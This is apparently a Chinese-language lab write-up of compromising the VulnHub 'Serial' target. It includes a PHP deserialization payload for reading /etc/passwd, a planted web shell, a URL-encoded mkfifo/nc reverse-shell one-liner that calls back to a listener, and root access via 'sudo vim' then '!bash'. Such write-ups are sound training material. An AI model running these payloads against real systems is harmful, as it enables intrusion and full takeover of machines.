serial靶场

项目地址

https://download.vulnhub.com/serial/serial.zip

实验过程

将下载好的靶机导入到VMware中，设置网络模式为NAT模式，然后开启靶机虚拟机

使用C段扫描，获取靶机IP地址

arp-scan -l

扫描一下端口

nmap -sV -p- 192.168.48.149

查看一下80端口和22端口

目录扫描一下

dirb http://192.168.48.149

发现这个目录下有文件下载一下

index.php文件中包含user.class.php文件且对cookie中的user参数进行了序列化和base64编码

user.class.php文件包含log.class.php文件且定义了Welcome和User两个类并调用了log.class.php文件中的handler函数

log.class.php定义了Log类和成员变量type_log且handler函数对变量进行了文件包含和输出

没有得到太多有用信息

访问原网站,用Burpsuite抓包查看cookie

由刚才三个文件可知这是base64编码

进行解码

构造payload，尝试读取passwd文件

我这边用了一个小Pwww目录下的1.php（我当时用在线编码不行出不来）

///可以写在任意目录下，要ip+地址/1.php

<?phpclass Log {private $type_log = "/etc/passwd";}class User {private $name = "admin";private $wel;function __construct() {$this->wel = new Log();}
}
$obj = new User();
echo base64_encode(serialize($obj));

发现除了root还有sk4可以登陆（/bin/basn）

想办法获取shell

在小p下写了一个1.txt木马

将1php内容修改为ip/1.txt

获得编码后的代码

更换抓包后的cooker得到200

输入?cmd=id

在Kali开启一个监听

反弹shell

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.48.130+8888+>/tmp/f

没有反应但是反弹成功了

提权

查看系统版本内核

在根目录发现一个txt.bak文件

查看一下

获得了sk4的登录账号和密码因为之前扫出来有22端口开放

使用远程连接

登陆成功

尝试进入root模式

失败了

试试sudo vim 进入命令模式输入!bash

提权成功